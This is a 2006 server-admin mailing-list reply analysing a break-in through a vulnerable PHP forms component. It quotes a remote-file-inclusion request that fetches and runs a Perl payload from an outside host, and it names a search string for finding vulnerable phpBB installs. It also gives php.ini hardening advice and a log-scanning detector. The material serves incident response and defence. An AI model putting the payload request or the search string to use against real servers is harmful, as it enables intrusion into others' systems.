Date:  Wed, 20 Sep 2006 02:33:17 +0200
From:  Michael Stauber <bq (at mark) solarspeed.net>
Subject:  [coba-e:07095] Re: Odd events for September 19, 2006
To:  coba-e (at mark) bluequartz.org
Message-Id:  <200609200233.17794.bq (at mark) solarspeed.net>
In-Reply-To:  <05d001c6dc3c$1e84b580$02002c0a@WebHoster>
References:  <05d001c6dc3c$1e84b580$02002c0a@WebHoster>
X-Mail-Count: 07095

Hi Gavin,

> Here is what I find in the logs for the same time as the file we found
>
> julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20http://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6* HTTP/1.0" 200 11120 "-" "Mozilla/5.0"

They tricked the vulnerable PHP script into executing the following commands:

cd /tmp
wget http://www.freewebtown.com/al00rs/v6.txt
perl v6.txt
rm v6*

To be protected against stuff like that you can reconfigure your php.ini to 
use the following settings:

safe_mode = On
safe_mode_gid = Off
register_globals = Off

That already is a good start and will stop most of these exploits cold in 
their tracks.

There are other configurational options like "safe_mode_exec_dir" or 
"open_basedir" which can be used to lock down PHP further.

Sure, there are PHP scripts which will flat out refuse to run with 
"safe_mode=On" or "register_globals=Off". Some of them can be tweaked to run 
with these settings on the secure side of things. Some can't. 

Usually the scripts which *require* you to configure your server for relaxed 
security are exactly those troublesome scripts that *will* get you hacked. 
Maybe not today or tomorrow, but it's just a matter of time and it will 
happen.

I think I already posted the link to this excellent article more than a dozen 
times to the Cobalt and BQ list, but here it is again:

On the Security of PHP, Part 1 & Part 2
By Jordan Dimov
http://www.developer.com/lang/article.php/918141


Allow me a small personal rant:

Just fire up Google and search for the string "Powered by phpBB 2.0.10". It 
will return 2,240,000 (!!!) results. Each of these results represents a 
vulnerable phpBB2 installation which you can "0wn" by using nothing more 
sophisticated than a web browser and some smarts.

Hence it is no surprise that PHP scripts like Joomla, Mambo, PHPnuke and 
phpBB2 give me the creeps, as each and every one of them has a very colorful 
history of blatant security faults which did lead to thousands of server 
compromises around the world. Partially this is due to bad programming, 
partially it's their widespread usage which makes these scripts so highly 
attractive for wanna-be-hackers. 

Partially it's because the users who install these scripts often forget to 
keep them up to date. Especially phpBB2 frequently releases updates to fix 
all kinds of issues - most of them are important security fixes. 

With the right enforcement of security procedures it is possible to prevent 
such exploits, but I understand that people in the web hosting business often 
are right between a rock and a hard place in that regard: Enforce so much 
security that the client gets uncomfortable and he may take his money 
elsewhere. :o/

-- 

With best regards,

Michael Stauber
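As an added illustration (not part of Michael's mail or of any project's code), here is a small Python check that flags requests shaped like the quoted one in an Apache combined-format access log: a query parameter whose value is itself a remote URL (the remote-file-inclusion signature), or a value that after URL-decoding starts with shell command words. The log lines it scans are constructed, with placeholder hosts.

```python
import re
from urllib.parse import unquote

# Added example (not from the mail): flag remote-file-inclusion attempts in
# Apache combined-format access logs. Sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a URL is the classic RFI signature.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Command words at the start of the value or right after a shell separator.
SHELL_WORDS = re.compile(r'(?:^|[;&|\s])(?:cd|wget|curl|perl|rm|chmod)\b')

def inspect_request(target):
    """Return [(param, reason), ...] for suspicious query parameters."""
    query = target.partition('?')[2]          # everything after the first '?'
    findings = []
    for part in query.split('&'):
        name, _, raw = part.partition('=')
        value = unquote(raw)                  # decode %20 etc. before matching
        if REMOTE_URL.match(value):
            findings.append((name, 'remote URL supplied as parameter'))
        if SHELL_WORDS.search(value):
            findings.append((name, 'shell commands in parameter'))
    return findings

def scan_log(lines):
    """Return [(host, time, target, findings), ...] for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not a combined-format line
        findings = inspect_request(m.group('target'))
        if findings:
            hits.append((m.group('host'), m.group('time'), m.group('target'), findings))
    return hits

SAMPLE_LOG = [
    # constructed benign request
    'client.example - - [15/Sep/2006:13:05:02 +0100] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # constructed request shaped like the one in the mail; placeholder hosts
    'attacker.example - - [15/Sep/2006:13:07:21 +0100] "GET /components/com_example/frame.php?ff_compath=http://payload.example/x.gif?&cmd=cd%20/tmp/;wget%20http://payload.example/v.txt;perl%20v.txt;rm%20-rf%20v* HTTP/1.0" 200 11120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for host, when, target, findings in scan_log(SAMPLE_LOG):
        print(host, when, target, findings)
```

A 200 status on such a request, as in the quoted line, is the cue to check /tmp and the web user's processes on that server rather than to assume the attempt failed.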